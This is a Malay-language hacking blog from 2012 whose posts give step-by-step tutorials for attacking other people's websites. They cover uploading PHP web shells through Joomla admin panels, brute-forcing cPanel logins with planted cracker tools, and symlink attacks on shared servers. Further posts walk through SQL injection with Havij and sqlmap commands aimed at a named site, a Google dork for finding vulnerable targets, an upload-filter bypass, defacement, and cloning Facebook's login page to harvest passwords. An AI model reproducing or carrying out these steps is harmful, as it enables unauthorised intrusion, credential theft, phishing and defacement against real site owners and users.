~: MJ Design Official :~

Welcome to ~: MJ Design :~ .Get a Design that you need from Michael John at this page.Free to all and always will be :D.Find us on Facebook

Backtrack Linux

The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community.

Ubuntu Linux

Fast, secure and stylishly simple, the Ubuntu operating system is used by 20 million people worldwide every day.

Exploits Database by Offensive Security

The Exploit Database an ultimate archive of exploits and vulnerable software. A great resource for penetration testers, vulnerability researchers, and security addicts alike.

Friday, 10 August 2012

Upload Shell In Joomla #1

Assalamualaikum
Harini aku nak ajar bagaimana mahu upload shell di yang berjenis Joomla.Untuk yang first ni aku ajar bagaimana upload shell di site yang berjenis joomla dengan menggunakan NinjaExplorer.Ok jom kita mulakan!

NinjaExplorer [download]


1. Buka dahulu Administration Login site target korang iaitu "http://[localhost]/administrator/

2. Isi username dan password kemudian login =)



3. Sekarang korang sudah berada di admin panel..

4. Klik pada Extension >> Extension Manager.

#Jika korang tidak menjumpai "Extension Manager".Maka korang boleh pilih "Install/Uninstall".



5. Klik button choose file dan pilih file NinjaExplorer yang telah didownload tadi.
6. Dah siap tu.Klik button "Upload & Install".


7. Now,pergi ke Component >> NinjaExplorer.

8. Lepas dah klik tu.Klik Icon Bumi >> Choose File >> Shell Korang >> Upload.

9. Dah selesai upload maka akan keluar nama shell korang di directory NinjaExplorer.

10.Cara untuk mencari shell :http://[localhost]/shellkorang.php

Wednesday, 4 July 2012

:: b374k Newbie3viLc063s v.3 :: Released!


Tergempar!!

Newbie3viLc063s sekali lagi melancarkan satu lagi shell b374k terbaik mereka iaitu :: b374k Newbie3viLc063s v.3 :: baru-baru ini.Shell kali ini lebih banyak functionnya berbanding shell yang lepas iaitu R.2 punya.

Antara tool baru yang ditambah ke dalam shell ini:

-String Encoder
-SQL Backup
-WHMCS Decoder
-Security Mode
-Domain Script
-Process
-Domain Script

Link: [Download]

Jika korang mahukan shell lain yang dibuat oleh NEC.Boleh download di link di bawah:

b374k Newbie3viLc063s 2012 R2 : [Download]
b374k m1n1 Newbie3vilc063s: [Download]

Saturday, 23 June 2012

Crack cPanel By Turbo Force

Assalamualaikum dan Salam Sejahtera.

Harini aku mahu ajar korang bagaimana hendak Crack cPanel dengan pantas.Haritu akuada ajar Crack cPanel tapi cara tu lambat sikit.hehehe :D .Ni ajar yang laju sikit.huhu.

Sebelum tu terima kasih kat Rain Seven DotMy sebab tunjukkan tool yang pOwerhakkk ni.

Baiklah.Kita mulakan sahaja tutorial ini:

1. Korang cari dulu site target dan tanam shell php.

2. Tanam "Cpanel + FTP Cracker" ke dalam web target untuk mendapatkan username sahaja.

[download]

3. Tanam pula "Turbo Force" ke dalam web target tersebut.

[download]

4. Ok,sekarang bukak "Cpanel + FTP Cracker" then klik enter.Kemudian copy kesemua username di "Cpanel + FTP Cracker" dan paste ke kotak User di "Turbo Force".

Contoh Gambar:


5. Sekarang,bukak Wordlist Dictionary dan paste ke kotak Pass di "Turbo Force"


Contoh Gambar:



6. Tekan start dan tunggu! :))

7. Akan terteralah Username dan Pass untuk login cPanel

#Untuk login cPanel -->> www.target.com:2082


Credit:Rainseven,Rilekscrew.Org,Tryag Academy.

Saturday, 26 May 2012

Symlink WP Site

Assalamualaikum

Kali ni aku akan ajarkan bagaimana seorang hacker dapat menembusi hacked site dalam satu server.Method ni dia dipanggil Symlink.Caranya bermula dengan satu site yang vuln.Dan apabila di symlink,seseorang itu dapat menembusi lebih 1000+ site.Tetapi ada juga site yang tidak dapat symlink xD

Sebelum tu download dulu tool yang penting di bawah ini:

Download Tool:[Mediafire]

Nama file sudah ditukar.Berikut nama baru:

*ShellHijau=AtomMotA
*MYSql=database

Jika sudah download tool penting tu.Tanpa membuang masa.Ayuh kita mulakan tutorial ini.

1.Upload shell No-Safe dalam target site,kemudian ikut step di bawah.























#Aku hanya mengajar cara symlink wp site.Joomla apa semua tu akan diajar selepas ini :D
Macam mana?mudahkan? =)

*Tutorial Symlink Joomla Site akan menyusul kemudian hari.

Thursday, 24 May 2012

Crack cPanel

Assalamualaikum.
Hari ni aku hendak ajar korang semua bagaimana mahu crack cPanel.Tutorial ini aku buat kerana Malik Kundang Khc yang mahu belajar.So,aku hanya tunaikan sahaja.Tanpa membuang masa.Ayuh kita mulakan tutorial ini :D

1) First korang perlu dulu mempunyai shell b374k.Kalau tidak ada.korang boleh ambil di sini

2) Buka shell b374k yang telah diupload dalam site mangsa korang

3) Klik pada menu yang tertulis "BruteForce".Rujuk gambar di bawah:


4) Korang akan melihat dua kotak kecil yang tertulis pada atasnya User dan Pass

5) Copy list password yang telah aku sediakan di sini

6) Pastekan ia di kotak yang tertulis Pass.Rujuk gambar di bawah:


7) Tick cPanel dan klik button yang tertulis brute

8) Tunggu sehingga kerja-kerja brute tamat

9) Akan terteralah Username dan Pass untuk login cPanel

#Untuk login cPanel -->> www.localhost.com:2082

Credit:Mike Artine & Newbie3viLc063s.

Tuesday, 10 April 2012

MD5 Descrypter Online


Assalamualaikum.
Tidak ada apa sangat nak buat hari ni.So,aku nak share MD5 Descrypter Online yang aku jumpa di merata tempat.Tool ni digunakan untuk korang pecahkan password yang telah dihash.Silakan guna tool ini untuk kebaikan bersama :)

http://md5encryption.com
http://www.md5decrypter.com
http://md5crack.com/crackmd5.php
http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
http://md5-decrypter.com
http://www.md5decrypter.com/
http://www.xmd5.org
http://www.shell-storm.org/md5/
http://www.md5encrypter.com
http://www.cmd5.org

*tool MD5 Descrypter akan diupdate setiap masa jika aku temui site baru.

SQL Injection by Havij



Assalamualaikum.
Hari ni aku mahu ajar korang semua bagaimana cara nak hack sebuah site dengan menggunakan SQL Injection.Tutorial ini fungsi dia sama sahaja dengan tutorial yang lepas iaitu SQLMap With Backtrack.Tetapi tutorial kali ini ialah kita menggunakan suatu software yang direka khas oleh ITSECTEAM.Tanpa membuang masa.Ayuh kita mulakan tutorial ini.

Tutorial ini sudah diubah dari sini untuk kefahaman bersama.

1) Mula-mula download dulu tool di bawah ni:

(a).Havij

[[DOWNLOAD]]

(c).C99.PHP

[[DOWNLOAD]]


2) Sekarang KORANG perlu cari site yang vuln.Ikut step di bawah:


(a).Buka www.google.com


(b).Search dork di bawah:


" inurl:"id=" & intext:"Warning: mysql_fetch_assoc() "


Atau boleh download dork yang lebih banyak  di bawah ini:


[[DOWNLOAD]]


(c)Pilih salah satu site


3) Buka Havij


4) Masukkan alamat website yang error sebentar tadi


5) Tekan Analyze


6) Tunggu :)


~Siap~


7) Klik Tables


8) Tick kotak yang mana mrujuk ke arah informasi/data website or bla.bla.bla


9) Klik Get Tables


" Ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij"


10)Cari nama yang  username atau admin atau seakan dengannya


11)Klik Get Colums


~Siap~


12)Cari  colum yang tertulis "username" dan "password" atau seakan dengannya


" Kalau takde jugak.Boleh mintak dengan http://www.facebook.com/profile.php?id=100003183173269 "


13)Klik Get Data


" Akan keluar username dan password.Itulah username dan password admin "


" Ouh ye lupa.Jika korang mendapat password dalam bentuk pelik iaitu password yang mempunyai 32 huruf.Itu adalah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul "


Contoh Password:-
e10adc3949ba59abbe56e057f20f883e


14)Pecahkan password hash tadi dengan menggunakan havij

(a).Buka Havij


(b).Pergi ke MD5


(c).Masukkan hash MD5 tadi


(d).Tekan Start


(e).Enjoy XD


15)Cari admin page site tersebut menggunakan havij


(a).Pergi ke Find Admin


(b).Masukkan url site tersebut


(c).Klik Start


(d).Buka url yang diberi


16)Login site tersebut


17)Cari button upload


18)Upload shell c99 korang atau shell yang terdapat di Malaysia ;P


" Jika tidak dapat upload shell korang tadi.Korang boleh ubah name shell korang kepada c99.php.png.Ini akan menipu site tersebut kerana site tu tak bijak XD "

" Boleh juga menggunakan teknik temper data "


19)Buka shell korang yang telah upload tadi


" Cari shell yang bernama index.php atau main.php.Atau cari sahaja shell yang mungkin paparan utama website berkenaan "


19)Klik pada shell berkenaan


20)Klik Edit


21)Buang code asal dan masukkan code deface korang


22)Klik butang Save


Bukak site tadi dan enjoy la puas2 :D .Korang boleh juga kembangkan dork untuk dapatkan site yang bagus dan mantap (Y)

b374k Newbie3viLc063s 2012 R2 Released!

Selepas Shell b374k m1n1 Newbie3viLc063s v.2012 Release.Newbie3viLc063s baru-baru ini baru sahaja released satu lagi shell buatan mereka.Shell tersebut diberni nama Shell b374k Newbie3viLc063s 2012 R2.Shell terbaru mereka ini terdapat banyak fungsi yang terbaru.Antaranya ialah:-

-Zone-H 
-Symlink
-SQLI Scan 
-Website Whois 
-Port-Scanner 
-WP Reset 
-Jomlaa Reset
-CMS Scanner 
-VB Changer 
-About (http://translate.google.com/)
-Log-Out

Untuk mendapatkan shell tersebut.Anda dipersilakan untuk ambil di sini 

Tuesday, 27 March 2012

RC.MY Di Godam Oleh Tiada Otak

ScreenShot Yang Sempat Dirakam

Assalamualaikum

Hari ni ketika sedang syok di Facebook.Aku dikejutkan dengan satu berita daripada BlackHat Assasian bahawa laman sosial Rilekscrew digodam pada pukul 2.38.Aku juga difahamkan laman site tersebut masih lagi belum dibaik pulih sehingga sekarang.Menurut sumber yang boleh dipercayai.Laman sosial Rilekscrew itu digodam oleh seorang hacker yang dikenali "Tiada Otak".Penyerang terbabit ialah orang yang sama yang telah meng-hacked laman rasmi Dragon Force.Korang boleh baca di sini.Motif serangan ialah hanya untuk memberi nasihat kepada hacker yang lain.Lihat pada gambar di bawah untuk mengetahui motif sebenar Tiada Otak:


Apapun kami harap webmaster Rc.My mengambil iktibar tentang insiden yang berlaku ini.

Monday, 26 March 2012

Phishing With Backtrack


Assalamualaikum

Hari ni aku mahu ajar kepada korang bagaimana mahu membina Phishing Site atau dikenali sebagai Fake Login dengan menggunakan Backtrack.Phishing adalah satu method penipuan siber yang digunakan oleh kebanyakan hacker untuk mendapatkan email dan pass mangsa.Kebanyakan method ini banyak digunakan untuk facebook & blogger.

Sudah tahu apa itu Phishing?Ok.Jom kita mulakan.First,buka dulu Backtrack korang :)


Buka "Application" >> "Social Engineering Tools" >> "Social Engineering Toolkit" >> "set"

1) Korang akan mendapat 12 menu pilihan.Untuk set pilihan.Di huruf set > korang taip 2 dan enter

2) Sekarang korang akan mendapat 8 webattack.Untuk webattack pilihan.Di huruf set:webattack > korang taip 3 dan enter

3) Selepas pada step tadi.Korang akan mendapat 3 method pilihan.Untuk method pilihan.Di huruf set:webattack > korang taip 2 dan enter

4) Pada "Enter The Url To Clone" korang taip la url laman yang korang nak clone seperti http://www.facebook.com atau site pilihan yang korang mahu diclonekan

5) Akan dapatlah satu notis "Press {return} To Continue".Enter sahaja bila jumpa notis ini

Sudah habis di step tadi.Tutup Social Engineering Toolkit korang tadi (jangan pangkah).Korang buka pula "Terminal" dan taip "ipconfig".Kemudian klik enter dan copy addressnya.Korang boleh cari di sebelah tulisan "inet addr". (Copy nombor IP dia Ok?)

1) Buka browser dan paste adress yang korang copy tadi di ruang search di browser korang

2) Akan keluarlah Phishing Site korang yang baru
buat tadi.

3) Untuk menguji ianya berfungsi atau tidak.Cuba login di Phishing tersebut dan kembali balik ke Social Engineering Toolkit yang masih terbuka itu

4) Korang akan dapat melihat password korang sudah terpapar di situ

5) Setelah selesai mendapat email & password mangsa.Ctrl+C dan laman phishing korang akan ditutup dan korang bolehlah tutup Backtrack korang dengan selamat

Page Zizan Raja Lawak Di Godam

ScreenShot Yang Sempat Dirakam
Assalamualaikum

Kebiasaanya kita sentiasa mendengar "Jack Sparrow Hack Page Artis".Kali ini seperti ada satu perubahan yang hebat.Seorang hamba Allah yang menggelarkan diri mereka Segan Crew dengan ganasnya telah menggodam Page Zizan Rajalawak.Page yang mececah 1.3 m like itu dengan senang dirampas oleh Segan Crew pada waktu yang tidak dikenalpasti #baru tahu.Method yang digunakan dalam serangan ini tidak dapat diketahui.

Apapun ini merupakan satu kejayaan buat mereka kerana berjaya test security admin di page tersebut ^_^

Mesej yang ditinggalkan oleh crew terbabit:


Assalammualaikum. Secara rasminya Fanpage ini dikendalikan oleh Segan.Crew.
Jangan marah2.We only want test our artis fanpage vulnerability .
Next target. . .!


P/S: Mmmuahh! zizan !


Credit to :
http://www.facebook.com/pages/SeganCrew/258078144243368


@Page ada VULNERABILITY ke? xD


Untuk ke page tersebut bolehlah klik di sini


#Dikhabarkan page ini akan dipulangkan balik kepada admin pada 27.03.2012,7.00P.M waktu tempatan :)

Thursday, 22 March 2012

SqlMap With Backtrack


Assalamualaikum

Hari ni aku nak ajar macam mana nak guna SqlMap dalam Backtrack.Inilah sedikit cara bagaimana seseorang pengodam dapat access sesuatu website.Kebanyakan pengodam menggunakan Havij kerana havij adalah satu tool yang direka khas sama seperti SqlMap.Aku cadangkan korang menggunakan SqlMap kerana proses untuk mendapatkan username dan password admin lebih cepat berbanding Havij.Dalam tutorial ini,kita akan cuba dengan menggunakan site www.yboaofnc.com/event.php?id=35 atau site pilihan korang.Boleh dork sendiri di Google.Tanpa membuang masa.Jom kita mulakan tutorial ini.Pastikan korang sudah buka Backtrack :)

Buka pada "Application" >> "Backtrack" >> "Exploitation Tools" >> "Web Exploitation Tools" >> "SqlMap"

1) Taip python sqlmap.py -u www.yboaofnc.com/event.php?id=35 --dbs

2) Scan dan Tunggu

Akan dapatlah 3 database seperti ini:

[*] information_schema
[*] test
[*] yboa<--Yang dimahukan :D

3) Taip  python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa --tables

4) Scan dan Tunggu

5) Akan nampakla table yang terdapat dalam site tersebut

"So sekarang kita mahu melihat isi kandungan table allowed.So,korang buat seperti di bawah"

"Ingat.Setiap website mempunyai table yang lain2.So pilihlah yang berkaitan je dengan mengubah allowed kepada pilihan korang :D"

6) Taip  python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa –T allowed --columns

"Sekarang korang dah dapat 3 columns iaitu  id,pwd & uname.So sekarang masanya untuk kita dapatkan pwd.Caranya boleh ikut step di bawah"

7) Taip python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa -T allowed -C pwd --dump

8) Scan dan Tunggu

"Dah dapat dah passwordnya :D"

"So now.Masanya untuk korang dapatkan username dia pulak.Korang ikut step di bawah"

9)Taip  python sqlmap.py -u  www.yboaofnc.com/event.php?id=35 -T allowed -C uname --dump

"Hanya ubah nama depan C je :)"

10)Scan dan tunggu

11)Akhirnya dapat jugak username dan pass untuk login site tersebut.Apa yang kita perlu buat ialah mencari Admin Login dan Login site tersebut.